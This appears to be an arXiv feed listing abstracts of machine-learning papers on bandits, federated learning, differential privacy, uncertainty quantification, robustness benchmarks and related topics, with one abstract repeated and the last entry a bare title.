    No-Regret Linear Bandits beyond Realizability. (arXiv:2302.13252v2 [cs.LG] UPDATED)
    We study linear bandits when the underlying reward function is not linear. Existing work relies on a uniform misspecification parameter $\epsilon$ that measures the sup-norm error of the best linear approximation. This results in an unavoidable linear regret whenever $\epsilon > 0$. We describe a more natural model of misspecification which only requires the approximation error at each input $x$ to be proportional to the suboptimality gap at $x$. It captures the intuition that, for optimization problems, near-optimal regions should matter more and we can tolerate larger approximation errors in suboptimal regions. Quite surprisingly, we show that the classical LinUCB algorithm -- designed for the realizable case -- is automatically robust against such gap-adjusted misspecification. It achieves a near-optimal $\sqrt{T}$ regret for problems that the best-known regret is almost linear in time horizon $T$. Technically, our proof relies on a novel self-bounding argument that bounds the part of the regret due to misspecification by the regret itself.  ( 2 min )
    Improving Uncertainty Quantification of Variance Networks by Tree-Structured Learning. (arXiv:2212.12658v2 [cs.LG] UPDATED)
    To improve the uncertainty quantification of variance networks, we propose a novel tree-structured local neural network model that partitions the feature space into multiple regions based on uncertainty heterogeneity. A tree is built upon giving the training data, whose leaf nodes represent different regions where region-specific neural networks are trained to predict both the mean and the variance for quantifying uncertainty. The proposed Uncertainty-Splitting Neural Regression Tree (USNRT) employs novel splitting criteria. At each node, a neural network is trained on the full data first, and a statistical test for the residuals is conducted to find the best split, corresponding to the two sub-regions with the most significant uncertainty heterogeneity between them. USNRT is computationally friendly because very few leaf nodes are sufficient and pruning is unnecessary. Furthermore, an ensemble version can be easily constructed to estimate the total uncertainty including the aleatory and epistemic. On extensive UCI datasets, USNRT or its ensemble shows superior performance compared to some recent popular methods for quantifying uncertainty with variances. Through comprehensive visualization and analysis, we uncover how USNRT works and show its merits, revealing that uncertainty heterogeneity does exist in many datasets and can be learned by USNRT.  ( 2 min )
    Explainable Data-Driven Optimization: From Context to Decision and Back Again. (arXiv:2301.10074v2 [cs.LG] UPDATED)
    Data-driven optimization uses contextual information and machine learning algorithms to find solutions to decision problems with uncertain parameters. While a vast body of work is dedicated to interpreting machine learning models in the classification setting, explaining decision pipelines involving learning algorithms remains unaddressed. This lack of interpretability can block the adoption of data-driven solutions as practitioners may not understand or trust the recommended decisions. We bridge this gap by introducing a counterfactual explanation methodology tailored to explain solutions to data-driven problems. We introduce two classes of explanations and develop methods to find nearest explanations of random forest and nearest-neighbor predictors. We demonstrate our approach by explaining key problems in operations management such as inventory management and routing.  ( 2 min )
    Heterogeneous Federated Learning: State-of-the-art and Research Challenges. (arXiv:2307.10616v1 [cs.LG])
    Federated learning (FL) has drawn increasing attention owing to its potential use in large-scale industrial applications. Existing federated learning works mainly focus on model homogeneous settings. However, practical federated learning typically faces the heterogeneity of data distributions, model architectures, network environments, and hardware devices among participant clients. Heterogeneous Federated Learning (HFL) is much more challenging, and corresponding solutions are diverse and complex. Therefore, a systematic survey on this topic about the research challenges and state-of-the-art is essential. In this survey, we firstly summarize the various research challenges in HFL from five aspects: statistical heterogeneity, model heterogeneity, communication heterogeneity, device heterogeneity, and additional challenges. In addition, recent advances in HFL are reviewed and a new taxonomy of existing HFL methods is proposed with an in-depth analysis of their pros and cons. We classify existing methods from three different levels according to the HFL procedure: data-level, model-level, and server-level. Finally, several critical and promising future research directions in HFL are discussed, which may facilitate further developments in this field. A periodically updated collection on HFL is available at https://github.com/marswhu/HFL_Survey.  ( 2 min )
    Pre-trained Perceptual Features Improve Differentially Private Image Generation. (arXiv:2205.12900v4 [stat.ML] UPDATED)
    Training even moderately-sized generative models with differentially-private stochastic gradient descent (DP-SGD) is difficult: the required level of noise for reasonable levels of privacy is simply too large. We advocate instead building off a good, relevant representation on an informative public dataset, then learning to model the private data with that representation. In particular, we minimize the maximum mean discrepancy (MMD) between private target data and a generator's distribution, using a kernel based on perceptual features learned from a public dataset. With the MMD, we can simply privatize the data-dependent term once and for all, rather than introducing noise at each step of optimization as in DP-SGD. Our algorithm allows us to generate CIFAR10-level images with $\epsilon \approx 2$ which capture distinctive features in the distribution, far surpassing the current state of the art, which mostly focuses on datasets such as MNIST and FashionMNIST at a large $\epsilon \approx 10$. Our work introduces simple yet powerful foundations for reducing the gap between private and non-private deep generative models. Our code is available at \url{https://github.com/ParkLabML/DP-MEPF}.  ( 2 min )
    Global Optimization with Parametric Function Approximation. (arXiv:2211.09100v3 [cs.LG] UPDATED)
    We consider the problem of global optimization with noisy zeroth order oracles - a well-motivated problem useful for various applications ranging from hyper-parameter tuning for deep learning to new material design. Existing work relies on Gaussian processes or other non-parametric family, which suffers from the curse of dimensionality. In this paper, we propose a new algorithm GO-UCB that leverages a parametric family of functions (e.g., neural networks) instead. Under a realizable assumption and a few other mild geometric conditions, we show that GO-UCB achieves a cumulative regret of \~O$(\sqrt{T})$ where $T$ is the time horizon. At the core of GO-UCB is a carefully designed uncertainty set over parameters based on gradients that allows optimistic exploration. Synthetic and real-world experiments illustrate GO-UCB works better than popular Bayesian optimization approaches, even if the model is misspecified.  ( 2 min )
    Deep Exploration for Recommendation Systems. (arXiv:2109.12509v3 [cs.IR] UPDATED)
    Modern recommendation systems ought to benefit by probing for and learning from delayed feedback. Research has tended to focus on learning from a user's response to a single recommendation. Such work, which leverages methods of supervised and bandit learning, forgoes learning from the user's subsequent behavior. Where past work has aimed to learn from subsequent behavior, there has been a lack of effective methods for probing to elicit informative delayed feedback. Effective exploration through probing for delayed feedback becomes particularly challenging when rewards are sparse. To address this, we develop deep exploration methods for recommendation systems. In particular, we formulate recommendation as a sequential decision problem and demonstrate benefits of deep exploration over single-step exploration. Our experiments are carried out with high-fidelity industrial-grade simulators and establish large improvements over existing algorithms.  ( 2 min )
    Invariant Aggregator for Defending against Federated Backdoor Attacks. (arXiv:2210.01834v2 [cs.LG] UPDATED)
    Federated learning is gaining popularity as it enables training high-utility models across several clients without directly sharing their private data. As a downside, the federated setting makes the model vulnerable to various adversarial attacks in the presence of malicious clients. Despite the theoretical and empirical success in defending against attacks that aim to degrade models' utility, defense against backdoor attacks that increase model accuracy on backdoor samples exclusively without hurting the utility on other samples remains challenging. To this end, we first analyze the vulnerability of federated learning to backdoor attacks over a flat loss landscape which is common for well-designed neural networks such as Resnet [He et al., 2015] but is often overlooked by previous works. Over a flat loss landscape, misleading federated learning models to exclusively benefit malicious clients with backdoor samples do not require a significant difference between malicious and benign client-wise updates, making existing defenses insufficient. In contrast, we propose an invariant aggregator that redirects the aggregated update to invariant directions that are generally useful via selectively masking out the gradient elements that favor few and possibly malicious clients regardless of the difference magnitude. Theoretical results suggest that our approach provably mitigates backdoor attacks over both flat and sharp loss landscapes. Empirical results on three datasets with different modalities and varying numbers of clients further demonstrate that our approach mitigates a broad class of backdoor attacks with a negligible cost on the model utility.  ( 3 min )
    Model Selection for Generic Contextual Bandits. (arXiv:2107.03455v2 [stat.ML] UPDATED)
    We consider the problem of model selection for the general stochastic contextual bandits under the realizability assumption. We propose a successive refinement based algorithm called Adaptive Contextual Bandit ({\ttfamily ACB}), that works in phases and successively eliminates model classes that are too simple to fit the given instance. We prove that this algorithm is adaptive, i.e., the regret rate order-wise matches that of any provable contextual bandit algorithm (ex. \cite{falcon}), that needs the knowledge of the true model class. The price of not knowing the correct model class turns out to be only an additive term contributing to the second order term in the regret bound. This cost possess the intuitive property that it becomes smaller as the model class becomes easier to identify, and vice-versa. We also show that a much simpler explore-then-commit (ETC) style algorithm also obtains similar regret bound, despite not knowing the true model class. However, the cost of model selection is higher in ETC as opposed to in {\ttfamily ACB}, as expected. Furthermore, for the special case of linear contextual bandits, we propose specialized algorithms that obtain sharper guarantees compared to the generic setup.  ( 2 min )
    Efficient Guided Generation for Large Language Models. (arXiv:2307.09702v2 [cs.CL] UPDATED)
    In this article we describe an efficient approach to guiding language model text generation with regular expressions and context-free grammars. Our approach adds little to no overhead to the token sequence generation process, and makes guided generation feasible in practice. An implementation is provided in the open source Python library Outlines.  ( 2 min )
    Warming up recurrent neural networks to maximise reachable multistability greatly improves learning. (arXiv:2106.01001v3 [cs.LG] UPDATED)
    Training recurrent neural networks is known to be difficult when time dependencies become long. In this work, we show that most standard cells only have one stable equilibrium at initialisation, and that learning on tasks with long time dependencies generally occurs once the number of network stable equilibria increases; a property known as multistability. Multistability is often not easily attained by initially monostable networks, making learning of long time dependencies between inputs and outputs difficult. This insight leads to the design of a novel way to initialise any recurrent cell connectivity through a procedure called "warmup" to improve its capability to learn arbitrarily long time dependencies. This initialisation procedure is designed to maximise network reachable multistability, i.e., the number of equilibria within the network that can be reached through relevant input trajectories, in few gradient steps. We show on several information restitution, sequence classification, and reinforcement learning benchmarks that warming up greatly improves learning speed and performance, for multiple recurrent cells, but sometimes impedes precision. We therefore introduce a double-layer architecture initialised with a partial warmup that is shown to greatly improve learning of long time dependencies while maintaining high levels of precision. This approach provides a general framework for improving learning abilities of any recurrent cell when long time dependencies are present. We also show empirically that other initialisation and pretraining procedures from the literature implicitly foster reachable multistability of recurrent cells.  ( 3 min )
    Opinion Market Model: Stemming Far-Right Opinion Spread using Positive Interventions. (arXiv:2208.06620v2 [cs.SI] UPDATED)
    Online extremism has severe societal consequences, including normalizing hate speech, user radicalization, and increased social divisions. Various mitigation strategies have been explored to address these consequences. One such strategy uses positive interventions: controlled signals that add attention to the opinion ecosystem to boost certain opinions. To evaluate the effectiveness of positive interventions, we introduce the Opinion Market Model (OMM), a two-tier online opinion ecosystem model that considers both inter-opinion interactions and the role of positive interventions. The size of the opinion attention market is modeled in the first tier using the multivariate discrete-time Hawkes process; in the second tier, opinions cooperate and compete for market share, given limited attention using the market share attraction model. We demonstrate the convergence of our proposed estimation scheme on a synthetic dataset. Next, we test OMM on two learning tasks, applying to two real-world datasets to predict attention market shares and uncover latent relationships between online items. The first dataset comprises Facebook and Twitter discussions containing moderate and far-right opinions about bushfires and climate change. The second dataset captures popular VEVO artists' YouTube and Twitter attention volumes. OMM outperforms the state-of-the-art predictive models on both datasets and captures latent cooperation-competition relations. We uncover (1) self- and cross-reinforcement between far-right and moderate opinions on the bushfires and (2) pairwise artist relations that correlate with real-world interactions such as collaborations and long-lasting feuds. Lastly, we use OMM as a testbed for positive interventions and show how media coverage modulates the spread of far-right opinions.  ( 3 min )
    Data-Driven Modeling of Noise Time Series with Convolutional Generative Adversarial Networks. (arXiv:2207.01110v3 [eess.SP] UPDATED)
    Random noise arising from physical processes is an inherent characteristic of measurements and a limiting factor for most signal processing and data analysis tasks. Given the recent interest in generative adversarial networks (GANs) for data-driven modeling, it is important to determine to what extent GANs can faithfully reproduce noise in target data sets. In this paper, we present an empirical investigation that aims to shed light on this issue for time series. Namely, we assess two general-purpose GANs for time series that are based on the popular deep convolutional GAN (DCGAN) architecture, a direct time-series model and an image-based model that uses a short-time Fourier transform (STFT) data representation. The GAN models are trained and quantitatively evaluated using distributions of simulated noise time series with known ground-truth parameters. Target time series distributions include a broad range of noise types commonly encountered in physical measurements, electronics, and communication systems: band-limited thermal noise, power law noise, shot noise, and impulsive noise. We find that GANs are capable of learning many noise types, although they predictably struggle when the GAN architecture is not well suited to some aspects of the noise, e.g., impulsive time-series with extreme outliers. Our findings provide insights into the capabilities and potential limitations of current approaches to time-series GANs and highlight areas for further research. In addition, our battery of tests provides a useful benchmark to aid the development of deep generative models for time series.  ( 3 min )
    Provably Efficient UCB-type Algorithms For Learning Predictive State Representations. (arXiv:2307.00405v2 [cs.LG] UPDATED)
    The general sequential decision-making problem, which includes Markov decision processes (MDPs) and partially observable MDPs (POMDPs) as special cases, aims at maximizing a cumulative reward by making a sequence of decisions based on a history of observations and actions over time. Recent studies have shown that the sequential decision-making problem is statistically learnable if it admits a low-rank structure modeled by predictive state representations (PSRs). Despite these advancements, existing approaches typically involve oracles or steps that are not computationally efficient. On the other hand, the upper confidence bound (UCB) based approaches, which have served successfully as computationally efficient methods in bandits and MDPs, have not been investigated for more general PSRs, due to the difficulty of optimistic bonus design in these more challenging settings. This paper proposes the first known UCB-type approach for PSRs, featuring a novel bonus term that upper bounds the total variation distance between the estimated and true models. We further characterize the sample complexity bounds for our designed UCB-type algorithms for both online and offline PSRs. In contrast to existing approaches for PSRs, our UCB-type algorithms enjoy computational efficiency, last-iterate guaranteed near-optimal policy, and guaranteed model accuracy.  ( 2 min )
    MultiRobustBench: Benchmarking Robustness Against Multiple Attacks. (arXiv:2302.10980v3 [cs.LG] UPDATED)
    The bulk of existing research in defending against adversarial examples focuses on defending against a single (typically bounded Lp-norm) attack, but for a practical setting, machine learning (ML) models should be robust to a wide variety of attacks. In this paper, we present the first unified framework for considering multiple attacks against ML models. Our framework is able to model different levels of learner's knowledge about the test-time adversary, allowing us to model robustness against unforeseen attacks and robustness against unions of attacks. Using our framework, we present the first leaderboard, MultiRobustBench, for benchmarking multiattack evaluation which captures performance across attack types and attack strengths. We evaluate the performance of 16 defended models for robustness against a set of 9 different attack types, including Lp-based threat models, spatial transformations, and color changes, at 20 different attack strengths (180 attacks total). Additionally, we analyze the state of current defenses against multiple attacks. Our analysis shows that while existing defenses have made progress in terms of average robustness across the set of attacks used, robustness against the worst-case attack is still a big open problem as all existing models perform worse than random guessing.  ( 2 min )
    My Boli: Code-mixed Marathi-English Corpora, Pretrained Language Models and Evaluation Benchmarks. (arXiv:2306.14030v2 [cs.CL] UPDATED)
    The research on code-mixed data is limited due to the unavailability of dedicated code-mixed datasets and pre-trained language models. In this work, we focus on the low-resource Indian language Marathi which lacks any prior work in code-mixing. We present L3Cube-MeCorpus, a large code-mixed Marathi-English (Mr-En) corpus with 10 million social media sentences for pretraining. We also release L3Cube-MeBERT and MeRoBERTa, code-mixed BERT-based transformer models pre-trained on MeCorpus. Furthermore, for benchmarking, we present three supervised datasets MeHate, MeSent, and MeLID for downstream tasks like code-mixed Mr-En hate speech detection, sentiment analysis, and language identification respectively. These evaluation datasets individually consist of manually annotated \url{~}12,000 Marathi-English code-mixed tweets. Ablations show that the models trained on this novel corpus significantly outperform the existing state-of-the-art BERT models. This is the first work that presents artifacts for code-mixed Marathi research. All datasets and models are publicly released at https://github.com/l3cube-pune/MarathiNLP .  ( 2 min )
    Post-variational quantum neural networks. (arXiv:2307.10560v1 [quant-ph])
    Quantum computing has the potential to provide substantial computational advantages over current state-of-the-art classical supercomputers. However, current hardware is not advanced enough to execute fault-tolerant quantum algorithms. An alternative of using hybrid quantum-classical computing with variational algorithms can exhibit barren plateau issues, causing slow convergence of gradient-based optimization techniques. In this paper, we discuss "post-variational strategies", which shift tunable parameters from the quantum computer to the classical computer, opting for ensemble strategies when optimizing quantum models. We discuss various strategies and design principles for constructing individual quantum circuits, where the resulting ensembles can be optimized with convex programming. Further, we discuss architectural designs of post-variational quantum neural networks and analyze the propagation of estimation errors throughout such neural networks. Lastly, we show that our algorithm can be applied to real-world applications such as image classification on handwritten digits, producing a 96% classification accuracy.
    Causality-oriented robustness: exploiting general additive interventions. (arXiv:2307.10299v1 [stat.ME])
    Since distribution shifts are common in real-world applications, there is a pressing need for developing prediction models that are robust against such shifts. Existing frameworks, such as empirical risk minimization or distributionally robust optimization, either lack generalizability for unseen distributions or rely on postulated distance measures. Alternatively, causality offers a data-driven and structural perspective to robust predictions. However, the assumptions necessary for causal inference can be overly stringent, and the robustness offered by such causal models often lacks flexibility. In this paper, we focus on causality-oriented robustness and propose Distributional Robustness via Invariant Gradients (DRIG), a method that exploits general additive interventions in training data for robust predictions against unseen interventions, and naturally interpolates between in-distribution prediction and causality. In a linear setting, we prove that DRIG yields predictions that are robust among a data-dependent class of distribution shifts. Furthermore, we show that our framework includes anchor regression (Rothenh\"ausler et al.\ 2021) as a special case, and that it yields prediction models that protect against more diverse perturbations. We extend our approach to the semi-supervised domain adaptation setting to further improve prediction performance. Finally, we empirically validate our methods on synthetic simulations and on single-cell data.  ( 2 min )
    Time for aCTIon: Automated Analysis of Cyber Threat Intelligence in the Wild. (arXiv:2307.10214v1 [cs.CR])
    Cyber Threat Intelligence (CTI) plays a crucial role in assessing risks and enhancing security for organizations. However, the process of extracting relevant information from unstructured text sources can be expensive and time-consuming. Our empirical experience shows that existing tools for automated structured CTI extraction have performance limitations. Furthermore, the community lacks a common benchmark to quantitatively assess their performance. We fill these gaps providing a new large open benchmark dataset and aCTIon, a structured CTI information extraction tool. The dataset includes 204 real-world publicly available reports and their corresponding structured CTI information in STIX format. Our team curated the dataset involving three independent groups of CTI analysts working over the course of several months. To the best of our knowledge, this dataset is two orders of magnitude larger than previously released open source datasets. We then design aCTIon, leveraging recently introduced large language models (GPT3.5) in the context of two custom information extraction pipelines. We compare our method with 10 solutions presented in previous work, for which we develop our own implementations when open-source implementations were lacking. Our results show that aCTIon outperforms previous work for structured CTI extraction with an improvement of the F1-score from 10%points to 50%points across all tasks.  ( 2 min )
    A Step Towards Worldwide Biodiversity Assessment: The BIOSCAN-1M Insect Dataset. (arXiv:2307.10455v1 [cs.CV])
    In an effort to catalog insect biodiversity, we propose a new large dataset of hand-labelled insect images, the BIOSCAN-Insect Dataset. Each record is taxonomically classified by an expert, and also has associated genetic information including raw nucleotide barcode sequences and assigned barcode index numbers, which are genetically-based proxies for species classification. This paper presents a curated million-image dataset, primarily to train computer-vision models capable of providing image-based taxonomic assessment, however, the dataset also presents compelling characteristics, the study of which would be of interest to the broader machine learning community. Driven by the biological nature inherent to the dataset, a characteristic long-tailed class-imbalance distribution is exhibited. Furthermore, taxonomic labelling is a hierarchical classification scheme, presenting a highly fine-grained classification problem at lower levels. Beyond spurring interest in biodiversity research within the machine learning community, progress on creating an image-based taxonomic classifier will also further the ultimate goal of all BIOSCAN research: to lay the foundation for a comprehensive survey of global biodiversity. This paper introduces the dataset and explores the classification task through the implementation and analysis of a baseline classifier.  ( 2 min )
    Learning Formal Specifications from Membership and Preference Queries. (arXiv:2307.10434v1 [cs.FL])
    Active learning is a well-studied approach to learning formal specifications, such as automata. In this work, we extend active specification learning by proposing a novel framework that strategically requests a combination of membership labels and pair-wise preferences, a popular alternative to membership labels. The combination of pair-wise preferences and membership labels allows for a more flexible approach to active specification learning, which previously relied on membership labels only. We instantiate our framework in two different domains, demonstrating the generality of our approach. Our results suggest that learning from both modalities allows us to robustly and conveniently identify specifications via membership and preferences.  ( 2 min )
  • Open

    Quantitative CLTs in Deep Neural Networks. (arXiv:2307.06092v2 [cs.LG] UPDATED)
    We study the distribution of a fully connected neural network with random Gaussian weights and biases in which the hidden layer widths are proportional to a large constant $n$. Under mild assumptions on the non-linearity, we obtain quantitative bounds on normal approximations valid at large but finite $n$ and any fixed network depth. Our theorems show both for the finite-dimensional distributions and the entire process, that the distance between a random fully connected network (and its derivatives) to the corresponding infinite width Gaussian process scales like $n^{-\gamma}$ for $\gamma>0$, with the exponent depending on the metric used to measure discrepancy. Our bounds are strictly stronger in terms of their dependence on network width than any previously available in the literature; in the one-dimensional case, we also prove that they are optimal, i.e., we establish matching lower bounds.
    Impatient Bandits: Optimizing Recommendations for the Long-Term Without Delay. (arXiv:2307.09943v2 [cs.LG] UPDATED)
    Recommender systems are a ubiquitous feature of online platforms. Increasingly, they are explicitly tasked with increasing users' long-term satisfaction. In this context, we study a content exploration task, which we formalize as a multi-armed bandit problem with delayed rewards. We observe that there is an apparent trade-off in choosing the learning signal: Waiting for the full reward to become available might take several weeks, hurting the rate at which learning happens, whereas measuring short-term proxy rewards reflects the actual long-term goal only imperfectly. We address this challenge in two steps. First, we develop a predictive model of delayed rewards that incorporates all information obtained to date. Full observations as well as partial (short or medium-term) outcomes are combined through a Bayesian filter to obtain a probabilistic belief. Second, we devise a bandit algorithm that takes advantage of this new predictive model. The algorithm quickly learns to identify content aligned with long-term success by carefully balancing exploration and exploitation. We apply our approach to a podcast recommendation problem, where we seek to identify shows that users engage with repeatedly over two months. We empirically validate that our approach results in substantially better performance compared to approaches that either optimize for short-term proxies, or wait for the long-term outcome to be fully realized.
    Chordal Averaging on Flag Manifolds and Its Applications. (arXiv:2303.13501v2 [cs.CV] UPDATED)
    This paper presents a new, provably-convergent algorithm for computing the flag-mean and flag-median of a set of points on a flag manifold under the chordal metric. The flag manifold is a mathematical space consisting of flags, which are sequences of nested subspaces of a vector space that increase in dimension. The flag manifold is a superset of a wide range of known matrix spaces, including Stiefel and Grassmanians, making it a general object that is useful in a wide variety computer vision problems. To tackle the challenge of computing first order flag statistics, we first transform the problem into one that involves auxiliary variables constrained to the Stiefel manifold. The Stiefel manifold is a space of orthogonal frames, and leveraging the numerical stability and efficiency of Stiefel-manifold optimization enables us to compute the flag-mean effectively. Through a series of experiments, we show the competence of our method in Grassmann and rotation averaging, as well as principal component analysis. We release our source code under https://github.com/nmank/FlagAveraging.
    Nonlinear Meta-Learning Can Guarantee Faster Rates. (arXiv:2307.10870v1 [stat.ML])
    Many recent theoretical works on \emph{meta-learning} aim to achieve guarantees in leveraging similar representational structures from related tasks towards simplifying a target task. Importantly, the main aim in theory works on the subject is to understand the extent to which convergence rates -- in learning a common representation -- \emph{may scale with the number $N$ of tasks} (as well as the number of samples per task). First steps in this setting demonstrate this property when both the shared representation amongst tasks, and task-specific regression functions, are linear. This linear setting readily reveals the benefits of aggregating tasks, e.g., via averaging arguments. In practice, however, the representation is often highly nonlinear, introducing nontrivial biases in each task that cannot easily be averaged out as in the linear case. In the present work, we derive theoretical guarantees for meta-learning with nonlinear representations. In particular, assuming the shared nonlinearity maps to an infinite-dimensional RKHS, we show that additional biases can be mitigated with careful regularization that leverages the smoothness of task-specific regression functions,
    Leveraging Offline Data in Online Reinforcement Learning. (arXiv:2211.04974v2 [cs.LG] UPDATED)
    Two central paradigms have emerged in the reinforcement learning (RL) community: online RL and offline RL. In the online RL setting, the agent has no prior knowledge of the environment, and must interact with it in order to find an $\epsilon$-optimal policy. In the offline RL setting, the learner instead has access to a fixed dataset to learn from, but is unable to otherwise interact with the environment, and must obtain the best policy it can from this offline data. Practical scenarios often motivate an intermediate setting: if we have some set of offline data and, in addition, may also interact with the environment, how can we best use the offline data to minimize the number of online interactions necessary to learn an $\epsilon$-optimal policy? In this work, we consider this setting, which we call the \textsf{FineTuneRL} setting, for MDPs with linear structure. We characterize the necessary number of online samples needed in this setting given access to some offline dataset, and develop an algorithm, \textsc{FTPedel}, which is provably optimal, up to $H$ factors. We show through an explicit example that combining offline data with online interactions can lead to a provable improvement over either purely offline or purely online RL. Finally, our results illustrate the distinction between \emph{verifiable} learning, the typical setting considered in online RL, and \emph{unverifiable} learning, the setting often considered in offline RL, and show that there is a formal separation between these regimes.
    Invariant Causal Set Covering Machines. (arXiv:2306.04777v2 [cs.LG] UPDATED)
    Rule-based models, such as decision trees, appeal to practitioners due to their interpretable nature. However, the learning algorithms that produce such models are often vulnerable to spurious associations and thus, they are not guaranteed to extract causally-relevant insights. In this work, we build on ideas from the invariant causal prediction literature to propose Invariant Causal Set Covering Machines, an extension of the classical Set Covering Machine algorithm for conjunctions/disjunctions of binary-valued rules that provably avoids spurious associations. We demonstrate both theoretically and empirically that our method can identify the causal parents of a variable of interest in polynomial time.
    Dense Sample Deep Learning. (arXiv:2307.10991v1 [cs.AI])
    Deep Learning (DL) , a variant of the neural network algorithms originally proposed in the 1980s, has made surprising progress in Artificial Intelligence (AI), ranging from language translation, protein folding, autonomous cars, and more recently human-like language models (CHATbots), all that seemed intractable until very recently. Despite the growing use of Deep Learning (DL) networks, little is actually understood about the learning mechanisms and representations that makes these networks effective across such a diverse range of applications. Part of the answer must be the huge scale of the architecture and of course the large scale of the data, since not much has changed since 1987. But the nature of deep learned representations remain largely unknown. Unfortunately training sets with millions or billions of tokens have unknown combinatorics and Networks with millions or billions of hidden units cannot easily be visualized and their mechanisms cannot be easily revealed. In this paper, we explore these questions with a large (1.24M weights; VGG) DL in a novel high density sample task (5 unique tokens with at minimum 500 exemplars per token) which allows us to more carefully follow the emergence of category structure and feature construction. We use various visualization methods for following the emergence of the classification and the development of the coupling of feature detectors and structures that provide a type of graphical bootstrapping, From these results we harvest some basic observations of the learning dynamics of DL and propose a new theory of complex feature construction based on our results.
    Private Federated Learning with Autotuned Compression. (arXiv:2307.10999v1 [cs.LG])
    We propose new techniques for reducing communication in private federated learning without the need for setting or tuning compression rates. Our on-the-fly methods automatically adjust the compression rate based on the error induced during training, while maintaining provable privacy guarantees through the use of secure aggregation and differential privacy. Our techniques are provably instance-optimal for mean estimation, meaning that they can adapt to the ``hardness of the problem" with minimal interactivity. We demonstrate the effectiveness of our approach on real-world datasets by achieving favorable compression rates without the need for tuning.
    Model Selection for Generic Contextual Bandits. (arXiv:2107.03455v2 [stat.ML] UPDATED)
    We consider the problem of model selection for the general stochastic contextual bandits under the realizability assumption. We propose a successive refinement based algorithm called Adaptive Contextual Bandit ({\ttfamily ACB}), that works in phases and successively eliminates model classes that are too simple to fit the given instance. We prove that this algorithm is adaptive, i.e., the regret rate order-wise matches that of any provable contextual bandit algorithm (ex. \cite{falcon}), that needs the knowledge of the true model class. The price of not knowing the correct model class turns out to be only an additive term contributing to the second order term in the regret bound. This cost possess the intuitive property that it becomes smaller as the model class becomes easier to identify, and vice-versa. We also show that a much simpler explore-then-commit (ETC) style algorithm also obtains similar regret bound, despite not knowing the true model class. However, the cost of model selection is higher in ETC as opposed to in {\ttfamily ACB}, as expected. Furthermore, for the special case of linear contextual bandits, we propose specialized algorithms that obtain sharper guarantees compared to the generic setup.
    Instance-Dependent Near-Optimal Policy Identification in Linear MDPs via Online Experiment Design. (arXiv:2207.02575v2 [cs.LG] UPDATED)
    While much progress has been made in understanding the minimax sample complexity of reinforcement learning (RL) -- the complexity of learning on the "worst-case" instance -- such measures of complexity often do not capture the true difficulty of learning. In practice, on an "easy" instance, we might hope to achieve a complexity far better than that achievable on the worst-case instance. In this work we seek to understand the "instance-dependent" complexity of learning near-optimal policies (PAC RL) in the setting of RL with linear function approximation. We propose an algorithm, \textsc{Pedel}, which achieves a fine-grained instance-dependent measure of complexity, the first of its kind in the RL with function approximation setting, thereby capturing the difficulty of learning on each particular problem instance. Through an explicit example, we show that \textsc{Pedel} yields provable gains over low-regret, minimax-optimal algorithms and that such algorithms are unable to hit the instance-optimal rate. Our approach relies on a novel online experiment design-based procedure which focuses the exploration budget on the "directions" most relevant to learning a near-optimal policy, and may be of independent interest.
    Gaussian Process Priors for Systems of Linear Partial Differential Equations with Constant Coefficients. (arXiv:2212.14319v3 [stat.ML] UPDATED)
    Partial differential equations (PDEs) are important tools to model physical systems and including them into machine learning models is an important way of incorporating physical knowledge. Given any system of linear PDEs with constant coefficients, we propose a family of Gaussian process (GP) priors, which we call EPGP, such that all realizations are exact solutions of this system. We apply the Ehrenpreis-Palamodov fundamental principle, which works as a non-linear Fourier transform, to construct GP kernels mirroring standard spectral methods for GPs. Our approach can infer probable solutions of linear PDE systems from any data such as noisy measurements, or pointwise defined initial and boundary conditions. Constructing EPGP-priors is algorithmic, generally applicable, and comes with a sparse version (S-EPGP) that learns the relevant spectral frequencies and works better for big data sets. We demonstrate our approach on three families of systems of PDEs, the heat equation, wave equation, and Maxwell's equations, where we improve upon the state of the art in computation time and precision, in some experiments by several orders of magnitude.
    Correcting Underrepresentation and Intersectional Bias for Fair Classification. (arXiv:2306.11112v2 [cs.LG] UPDATED)
    We consider the problem of learning from data corrupted by underrepresentation bias, where positive examples are filtered from the data at different, unknown rates for a fixed number of sensitive groups. We show that with a small amount of unbiased data, we can efficiently estimate the group-wise drop-out parameters, even in settings where intersectional group membership makes learning each intersectional rate computationally infeasible. Using this estimate for the group-wise drop-out rate, we construct a re-weighting scheme that allows us to approximate the loss of any hypothesis on the true distribution, even if we only observe the empirical error on a biased sample. Finally, we present an algorithm encapsulating this learning and re-weighting process, and we provide strong PAC-style guarantees that, with high probability, our estimate of the risk of the hypothesis over the true distribution will be arbitrarily close to the true risk.
    Curiosity in Hindsight: Intrinsic Exploration in Stochastic Environments. (arXiv:2211.10515v2 [stat.ML] UPDATED)
    Consider the problem of exploration in sparse-reward or reward-free environments, such as in Montezuma's Revenge. In the curiosity-driven paradigm, the agent is rewarded for how much each realized outcome differs from their predicted outcome. But using predictive error as intrinsic motivation is fragile in stochastic environments, as the agent may become trapped by high-entropy areas of the state-action space, such as a "noisy TV". In this work, we study a natural solution derived from structural causal models of the world: Our key idea is to learn representations of the future that capture precisely the unpredictable aspects of each outcome -- which we use as additional input for predictions, such that intrinsic rewards only reflect the predictable aspects of world dynamics. First, we propose incorporating such hindsight representations into models to disentangle "noise" from "novelty", yielding Curiosity in Hindsight: a simple and scalable generalization of curiosity that is robust to stochasticity. Second, we instantiate this framework for the recently introduced BYOL-Explore algorithm as our prime example, resulting in the noise-robust BYOL-Hindsight. Third, we illustrate its behavior under a variety of different stochasticities in a grid world, and find improvements over BYOL-Explore in hard-exploration Atari games with sticky actions. Notably, we show state-of-the-art results in exploring Montezuma's Revenge with sticky actions, while preserving performance in the non-sticky setting.
    Multi-view self-supervised learning for multivariate variable-channel time series. (arXiv:2307.09614v2 [stat.ML] UPDATED)
    Labeling of multivariate biomedical time series data is a laborious and expensive process. Self-supervised contrastive learning alleviates the need for large, labeled datasets through pretraining on unlabeled data. However, for multivariate time series data, the set of input channels often varies between applications, and most existing work does not allow for transfer between datasets with different sets of input channels. We propose learning one encoder to operate on all input channels individually. We then use a message passing neural network to extract a single representation across channels. We demonstrate the potential of this method by pretraining our model on a dataset with six EEG channels and then fine-tuning it on a dataset with two different EEG channels. We compare models with and without the message passing neural network across different contrastive loss functions. We show that our method, combined with the TS2Vec loss, outperforms all other methods in most settings.
    The Unreasonable Effectiveness of Deep Evidential Regression. (arXiv:2205.10060v3 [cs.LG] UPDATED)
